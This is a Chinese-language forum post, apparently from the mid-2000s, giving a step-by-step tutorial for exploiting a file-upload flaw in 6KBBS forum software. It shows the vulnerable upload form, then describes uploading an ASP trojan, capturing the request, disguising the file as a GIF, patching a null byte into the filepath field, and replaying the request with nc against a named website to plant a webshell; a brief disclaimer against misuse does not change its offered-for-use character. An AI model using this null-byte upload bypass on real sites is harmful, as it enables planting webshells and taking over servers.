6KBBS上传漏洞攻击步骤
1.注册ID进入发贴页面 查看文件原代码<input type="hidden" name="filepath" value="">
<input type="hidden" name="act" value="upload">
文件:
<input type="file" name="file1" size=10>
<input type="submit" name="Submit" value="上传"
这是文件上传漏洞的特点,关键就在于filepath变量
2.上传一个ASP木马(/mao.asp) 然后进行WSockExper抓包
3.将两个包包(不是宝宝!嘻嘻~~~)保存为 mao.txt 然后用UltrEdit编辑。
在Content-Disposition: form-data; name="filepath"后面第2行输入刚才那个ASP(/mao.asp)的名字
将 mao.asp该为 mao.gif (其实就是做一个欺骗~!HOHO~~!)
光标移动到(/mao.asp)后面空一个空格,点编辑-->HEX功能-->HEX编辑:在OD前把20该为00 后保存
4.用NC来发送文件 nc [url]www.sxjcxx.com[/url] 80<mao.txt 文件上传成功 :)
5.在这里我们可以传自己的马了!将路径里的ASP修改一个名字 就可以了 呵呵~~
让我们来看是不是传上去了 呵呵 传上去了也
请勿用本教程进行破坏活动,后果自负!
动画下载
[url]http://www.77169.org/donghua/hole/200406/5033.html[/url]
页:
[1]